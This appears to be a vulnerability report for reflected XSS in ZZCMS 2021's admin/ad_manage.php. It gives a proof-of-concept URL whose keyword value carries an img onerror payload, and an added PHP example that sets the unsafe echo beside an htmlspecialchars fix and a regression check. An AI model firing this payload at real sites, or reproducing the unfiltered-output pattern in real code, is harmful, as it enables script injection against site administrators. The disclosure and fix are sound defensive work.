ZZCMS2021_XSS_1
PoC by rerce&rpsate
ZZCMS latest version download page:
http://www.zzcms.net/about/6.html
software link: https://github.com/Boomingjacob/ZZCMS/raw/main/zzcms2021.zip
Environmental requirements
PHP version >= 4.3.0
MySQL version >= 4.0.0
Vulnerability code:
In the file admin/ad_manage.php, line 18, the variable $keyword can be controlled through $_REQUEST['keyword']; it is then output on line 32 without being filtered.
POC:
http://your-ip/admin/ad_manage.php?keyword=a"><img src=1 onerror='alert(1)'/><"
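The unfiltered-output pattern the report describes, next to an output-encoding fix, as an added PHP example that is not ZZCMS code and not part of the original issue. The real contents of admin/ad_manage.php are not shown on this page, so the function names and the attribute-context markup are assumptions inferred from the PoC's leading a">.

```php
<?php
// Added illustration; NOT the contents of admin/ad_manage.php.
// Assumption: the keyword is echoed into a double-quoted HTML attribute,
// which is what the PoC's leading a"> implies. Function names are hypothetical.

// Unfiltered pattern the issue describes: request value goes straight into markup.
function render_search_unsafe($request) {
    $keyword = isset($request['keyword']) ? $request['keyword'] : '';
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// Hardened: encode for the HTML attribute context at the point of output.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
// Assumption: the page is served as UTF-8; pass the site's real charset.
function render_search_safe($request) {
    $keyword = isset($request['keyword']) ? $request['keyword'] : '';
    if (!is_string($keyword)) {   // keyword[]=x arrives as an array
        $keyword = '';
    }
    return '<input type="text" name="keyword" value="'
         . htmlspecialchars($keyword, ENT_QUOTES, 'UTF-8') . '">';
}

// Regression check: count the tags a browser would parse out of a rendering.
// A correctly encoded value leaves only the <input> element itself.
function count_tags($html) {
    return preg_match_all('/<[a-zA-Z]/', $html, $m);
}

// Constructed input: the keyword value from the PoC URL in the issue.
$request = array('keyword' => 'a"><img src=1 onerror=\'alert(1)\'/><"');

$unsafe = render_search_unsafe($request);
$safe   = render_search_safe($request);

echo "unsafe: $unsafe\n";
echo "tags parsed: " . count_tags($unsafe) . "\n";
echo "safe:   $safe\n";
echo "tags parsed: " . count_tags($safe) . "\n";
```

Encoding belongs at the output site and must match the context: htmlspecialchars covers HTML text and quoted attributes, not values placed inside script blocks or URLs.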